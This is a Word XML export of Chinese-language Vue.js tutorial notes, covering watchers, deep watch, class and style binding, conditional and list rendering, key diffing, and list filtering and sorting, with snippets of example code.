arr[0]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this.lastName = arr[1]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//简写，只读不改，默认不写set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fullName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console.log('get被调用了')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'-'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监视属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天气案例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3204845" cy="2703830"/>
            <wp:effectExtent l="0" t="0" r="10795" b="8890"/>
            <wp:docPr id="2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·点击切换天气时改变值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天气案例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关联计算属性info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今天天气很{{info}}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绑定事件的时候：@xxx="yyy" yyy可以写一些简单的语句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&lt;button @click="isHot = !isHot"&gt;切换天气&lt;/button&gt;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"changeWeather"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切换天气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//isHot为true是炎热，为false是凉爽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'炎热'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'凉爽'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changeWeather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监视属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·通过vm 对象的$watch()或watch 配置来监视指定的属性</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·当监视的属性变化时, 回调函数自动调用, 在函数内部进行计算</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·监视的属性必须存在，才能进行监视！！</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·监视的两种写法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- new Vue时传入watch配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 通过vm.$watch监视</w:t>
      </w:r>
    </w:p>
    <w:p/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天气案例_监视属性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今天天气很{{info}}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"changeWeather"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切换天气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'炎热'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'凉爽'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changeWeather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//监视属性内部配置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watch:{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//isHot为vm的属性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isHot:{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immediate:true, //初始化时让handler调用一下，默认值为false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//handler什么时候调用？当isHot发生改变时。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handler(newValue,oldValue){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console.log('isHot被修改了',newValue,oldValue)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//监视属性外部配置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$watch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'isHot'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immediate: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//初始化时让handler调用一下，默认值为false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//handler什么时候调用？当isHot发生改变时。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oldValue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'isHot被修改了'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oldValue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深度监视</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue中的watch默认不监测对象内部值的改变（一层）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·配置deep:true可以监测对象内部值改变（多层）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- Vue自身可以监测对象内部值的改变，但Vue提供的watch默认不可以！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 使用watch时根据数据的具体结构，决定是否采用深度监视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天气案例_深度监视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今天天气很{{info}}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"changeWeather"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切换天气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a的值是:{{numbers.a}}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"numbers.a++"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点我让a+1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b的值是:{{numbers.b}}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"numbers.b++"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点我让b+1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"numbers = {a:666,b:888}"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彻底替换掉numbers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{{numbers.c.d.e}}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'炎热'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'凉爽'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changeWeather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immediate:true, //初始化时让handler调用一下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//handler什么时候调用？当isHot发生改变时。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oldValue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'isHot被修改了'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oldValue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//监视多级结构中某个属性的变化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'numbers.a':{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handler(){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console.log('a被改变了')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//监视多级结构中所有属性的变化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deep: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//打开深度监视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'numbers改变了'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监视的简写形式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天气案例_监视属性_简写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今天天气很{{info}}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"changeWeather"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切换天气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'炎热'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'凉爽'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changeWeather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isHot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//正常写法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isHot:{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// immediate:true, //初始化时让handler调用一下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// deep:true,//深度监视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handler(newValue,oldValue){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console.log('isHot被修改了',newValue,oldValue)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//简写，默认不使用immediate和deep配置，只有handler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isHot(newValue,oldValue){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console.log('isHot被修改了',newValue,oldValue,this)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//正常写法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vm.$watch('isHot',{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immediate:true, //初始化时让handler调用一下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deep:true,//深度监视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handler(newValue,oldValue){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console.log('isHot被修改了',newValue,oldValue)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//简写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$watch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'isHot'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oldValue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'isHot被修改了'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oldValue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watch与computed对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·computed能完成的功能，watch都可以完成</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·watch能完成的功能，computed不一定能完成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 例如：watch可以进行异步操作</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·两个重要的小原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 所被Vue管理的函数，最好写成普通函数，这样this的指向才是vm 或 组件实例对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 所有不被Vue所管理的函数（定时器的回调函数、ajax的回调函数等、Promise的回调函数），最好写成箭头函数，这样this的指向才是vm 或 组件实例对象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姓名案例_watch实现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姓：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"firstName"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"lastName"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全名：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{{fullName}}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lastName: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fullName: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'张-三'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//监视firstName属性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//可开启异步任务，1秒后才改变全名，定时器一定要写成箭头函数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fullName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'-'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lastName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//监视lastName属性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lastName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fullName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firstName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'-'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t>class 与 style 绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·在应用界面中, 某个(些)元素的样式是变化的</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·class/style 绑定就是专门用来实现动态样式效果的技术</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>class 绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·写法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- class="xxx" xxx可以是字符串、对象、数组。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>表达式是字符串: 'classA'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 字符串写法适用于：类名不确定，要动态获取</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>表达式是对象: {classA:isA, classB: isB}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 对象写法适用于：要绑定多个样式，个数不确定，名字也不确定</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·表达式是数组: ['classA', 'classB']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 数组写法适用于：要绑定多个样式，个数确定，名字也确定，但不确定用不用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>style 绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·:style="{fontSize: xxx}"其中xxx是动态值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>:style="{ color: activeColor, fontSize: fontSize + 'px' }"</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·:style="[a,b]"其中a、b是样式对象。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>其中activeColor/fontSize 是data 属性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绑定样式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.basic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black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.happy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0.644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linear-gradient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30deg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yellow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yellow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.sad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dashed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197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gray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.normal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.atguigu1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yellowgreen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.atguigu2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.atguigu3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绑定class样式--字符串写法，适用于：样式的类名不确定，需要动态指定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"basic"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"mood"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"changeMood"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绑定class样式--数组写法，适用于：要绑定的样式个数不确定、名字也不确定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"basic"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"classArr"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绑定class样式--对象写法，适用于：要绑定的样式个数确定、名字也确定，但要动态决定用不用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"basic"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"classObj"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绑定style样式--对象写法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"basic"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"styleObj"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绑定style样式--数组写法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"basic"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"styleArr"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mood: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'normal'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classArr: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classObj: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atguigu1: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atguigu2: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styleObj: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fontSize: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'40px'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'red'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styleObj2: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backgroundColor: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'orange'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styleArr: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fontSize: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'40px'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'blue'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backgroundColor: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'gray'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changeMood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'happy'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'sad'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'normal'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//随机生成0、1、2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floor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random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()*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mood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条件渲染</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>条件渲染指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·v-if</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- v-if="表达式" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- v-else-if="表达式"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- v-else="表达式"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 适用于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 切换频率较低的场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-  特点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 不展示的DOM元素直接被移除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 注意</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- v-if可以和:v-else-if、v-else一起使用，但要求结构不能被“打断”</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·v-show</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- v-show="表达式"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 适用于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 切换频率较高的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-  特点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 不展示的DOM元素未被移除，仅仅是使用样式隐藏掉</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>                                </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 使用v-if时，元素可能无法获取到，而使用v-show一定可以获取到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条件渲染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当前的n值是:{{n}}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点我n+1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使用v-show做条件渲染，不展示的DOM元素未被移除，仅仅是使用样式隐藏掉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 v-show="false"&gt;欢迎来到{{name}}&lt;/h2&gt;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 v-show="1 === 1"&gt;欢迎来到{{name}}&lt;/h2&gt;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 v-show="qiehuan"&gt;欢迎来到{{name}}&lt;/h2&gt;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使用v-if做条件渲染，不展示的DOM元素直接被移除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 v-if="false"&gt;欢迎来到{{name}}&lt;/h2&gt;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 v-if="1 === 1"&gt;欢迎来到{{name}}&lt;/h2&gt;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v-else和v-else-if，要求结构不能被“打断”，如果中间插个没有v-if语句的标签，后面的就不生效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&lt;div v-if="n === 1"&gt;Angular&lt;/div&gt;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&lt;div v-else-if="n === 2"&gt;React&lt;/div&gt;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&lt;div&gt;xxx&lt;/div&gt;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&lt;div v-else-if="n === 3"&gt;Vue&lt;/div&gt;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&lt;div v-else&gt;哈哈&lt;/div&gt;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v-if与template的配合使用，template模板标签，不影响结构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template不能与v-show配合使用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 === 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尚硅谷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北京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qiehuan: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t>比较v-if 与v-show</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·如果需要频繁切换 v-show 较好</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·当条件不成立时, v-if 的所有子节点不会解析(项目中使用)</w:t>
      </w:r>
    </w:p>
    <w:p/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t>列表渲染</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本列表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·v-for指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 用于展示列表数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- v-for="(item, index) in xxx" :key="yyy"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 可遍历：数组、对象、字符串（用的很少）、指定次数（用的很少）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基本列表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人员列表1（遍历数组）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&lt;!--:key是每个节点的唯一标识，不能一样--&gt;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 in persons"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"p.id"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{{p.name}}-{{p.age}}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遍历数组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人员列表2（遍历数组）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&lt;!--第一个参数p是数组值，第二个参数index是数组索引--&gt;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"(p,index) of persons"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{{p.name}}-{{p.age}}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遍历对象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汽车信息（遍历对象）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&lt;!--第一个参数value是属性值，第二个参数k是属性名--&gt;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"(value,k) of car"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"k"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{{k}}-{{value}}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遍历字符串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测试遍历字符串（用得少）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&lt;!--第一个参数char是字符值，第二个参数index是字符串索引--&gt;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"(char,index) of str"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{{char}}-{{index}}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遍历数值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测试遍历指定次数（用得少）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&lt;!--遍历1到5（包含1和5）--&gt;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&lt;!--第一个参数number是数值，第二个参数index是数值索引，5是遍历次数--&gt;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"(number,index) of 5"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{{index}}-{{number}}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'李四'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'王五'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car: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'奥迪A8'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price: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'70万'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'黑色'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t>key的原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·当key为index时，可能会发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5080"/>
            <wp:docPr id="7" name="图片 7" descr="efbfcebada05c00a555707948709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fbfcebada05c00a5557079487097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·当key为唯一标识时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5080"/>
            <wp:docPr id="8" name="图片 8" descr="c91cf272d8fa96cfb77f01542cf4c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91cf272d8fa96cfb77f01542cf4c8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·react、vue中的key有什么作用？（key的内部原理）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 虚拟DOM中key的作用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 key是虚拟DOM对象的标识，当数据发生变化时，Vue会根据【新数据】生成【新的虚拟DOM】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--  随后Vue进行【新虚拟DOM】与【旧虚拟DOM】的差异比较</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 比较规则如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>                                        </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 对比规则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 旧虚拟DOM中找到了与新虚拟DOM相同的key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若虚拟DOM中内容没变, 直接使用之前的真实DOM！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若虚拟DOM中内容变了, 则生成新的真实DOM，随后替换掉页面中之前的真实DOM</w:t>
      </w:r>
    </w:p>
    <w:p/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旧虚拟DOM中未找到与新虚拟DOM相同的key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创建新的真实DOM，随后渲染到到页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>                                                </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·用index作为key可能会引发的问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 若对数据进行：逆序添加、逆序删除等破坏顺序操作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会产生没有必要的真实DOM更新 ==&gt; 界面效果没问题, 但效率低。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 如果结构中还包含输入类的DOM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会产生错误DOM更新 ==&gt; 界面有问题</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·开发中如何选择key?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 最好使用每条数据的唯一标识作为key, 比如id、手机号、身份证号、学号等唯一值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 如果不存在对数据的逆序添加、逆序删除等破坏顺序操作，仅用于渲染列表用于展示，使用index作为key是没有问题的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key的原理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遍历数组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人员列表（遍历数组）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@click.once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添加一个老刘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"(p,index) of persons"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{{p.name}}-{{p.age}}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'李四'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'王五'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'004'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'老刘'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列表过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2692400" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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1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·在搜索框按名字模糊查询，并显示查询结果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列表过滤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&lt;!--v-model="keyWord"双向绑定收集用户输入的信息，实时返回给后台--&gt;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"请输入名字"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"keyWord"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"(p,index) of filPerons"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{{p.name}}-{{p.age}}-{{p.sex}}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//用监视属性watch实现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//#region //可折叠代码开始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new Vue({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el:'#root',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data:{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keyWord:'',//输入框初始值为空串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persons:[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{id:'001',name:'马冬梅',age:19,sex:'女'},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{id:'002',name:'周冬雨',age:20,sex:'女'},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{id:'003',name:'周杰伦',age:21,sex:'男'},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{id:'004',name:'温兆伦',age:22,sex:'男'}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//保存过滤结果的数组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filPerons:[]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watch:{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keyWord:{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immediate:true,//初始化时让handler调用一下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handler(val){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// console.log(this.keyWord === "");//true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//.filter过滤数组，返回false的则过滤掉，将过滤结果赋值给this.filPerons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this.filPerons = this.persons.filter((p)=&gt;{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    //.indexOf(str)判断某个字符串是否包含某字符串，包含则返起始下标，所有字符串都包含""空字符串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    return p.name.indexOf(val) !== -1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//#endregion//可折叠代码结束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//用计算属性computed实现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//输入框初始值为空串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'马冬梅'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'女'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'周冬雨'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'女'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'周杰伦'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'004'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'温兆伦'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filPerons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console.log(this.keyWord === "");//true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//.filter过滤数组，返回false的则过滤掉，将过滤结果赋值给this.filPerons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//.indexOf(str)判断某个字符串是否包含某字符串，包含则返起始下标，所有字符串都包含""空字符串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indexOf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!== -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列表排序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3602355" cy="1642745"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="3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·实现年龄升序、年龄降序、原顺序功能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列表排序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"请输入名字"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"keyWord"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&lt;!--点击按钮时修改sortType的值--&gt;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"sortType = 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年龄升序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"sortType = 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年龄降序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"sortType = 0"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原顺序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"(p,index) of filPerons"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"p.id"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{{p.name}}-{{p.age}}-{{p.sex}}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sortType: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//0原顺序 1降序 2升序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'马冬梅'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'女'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'周冬雨'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'女'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'周杰伦'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'004'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'温兆伦'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filPerons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indexOf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!== 